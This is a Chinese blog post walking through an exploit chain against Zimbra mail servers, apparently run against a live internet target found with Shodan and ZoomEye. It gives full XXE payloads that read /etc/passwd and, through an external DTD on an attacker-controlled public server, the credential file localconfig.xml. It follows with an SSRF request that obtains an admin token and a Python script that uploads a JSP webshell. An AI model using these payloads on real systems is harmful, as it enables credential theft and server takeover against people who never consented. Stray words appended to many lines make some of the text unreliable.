本地搭建了很久,虚拟机忽然蹦了,。。。
上钟馗之眼和shodan找了个目标python
Zimbra配置文件位置为/conf/localconfig.xmlweb
根据《A Saga of Code Executions on Zimbra》RCE漏洞分析shell
https://blog.csdn.net/fnmsd/article/details/88657083ubuntu
Post :/Autodiscover/Autodiscover.xml
内容:服务器
<!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <Request> <EMailAddress>aaaaa</EMailAddress> <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema> </Request> </Autodiscover>
成功读到用户密码,说明XXE验证成功jsp
接下来构造payload读zimbra的配文件localconfig.xmlsvg
文章中说道:post
因为localconfig.xml为XML文件,须要加上CDATA标签才能做为文本读取,因为XXE不能内部实体进行拼接,因此此处须要使用外部dtd:.net
dtd内容:ssr
<!ENTITY % file SYSTEM "file:../conf/localconfig.xml"> <!ENTITY % start "<![CDATA["> <!ENTITY % end "]]>"> <!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
Post:/Autodiscover/Autodiscover.xml
内容:
<!DOCTYPE Autodiscover [ <!ENTITY % dtd SYSTEM "http://公网服务器/dtd"> %dtd; %all; ]> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <Request> <EMailAddress>aaaaa</EMailAddress> <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema> </Request> </Autodiscover>
成功读到zimbra用户帐号密码
低权限token可经过soap接口发送AuthRequest进行获取:
Post: /service/soap
内容:
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"> <soap:Header> <context xmlns="urn:zimbra"> <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/> </context> </soap:Header> <soap:Body> <AuthRequest xmlns="urn:zimbraAccount"> <account by="adminName">zimbra</account> <password>上一步获得密码</password> </AuthRequest> </soap:Body> </soap:Envelope>
拿到低权限token
Post: /service/proxy?target=https://127.0.0.1:7071/service/admin/soap
Ps:
Host:后面加端口7071
Cookie中设置Key为ZM_ADMIN_AUTH_TOKEN,值为上面请求所获取的token。
发送同上Body内容,可是AuthRequest的xmlns要改成:urn:zimbraAdmin,不然获取的仍是普通权限的Token
得到ADMIN_AUTH_TOKEN
用python脚本上传
import requests file= { 'clientFile':("test.jsp",r'<%out.println("test");%>',"text/plain"), 'requestId':(None,"12",None), } headers ={ "Cookie":"ZM_ADMIN_AUTH_TOKEN=admin_token",#改为本身的admin_token "Host":"foo:7071" } r=requests.post("https://xxxx/service/extension/clientUploader/upload",files=file,headers=headers,verify=False) print(r.text)
Shell路径
https://xxxx/downloads/test.jsp
访问shell得加上ADMIN_AUTH_TOKEN
这里我没有成功
仍是得本地搭建啊,我用ubuntu14.0.4搭建
Zimbra的环境搭建比较麻烦,在此推荐篇有关zimbra搭建的优质博文
https://www.jianshu.com/p/722bc70ff426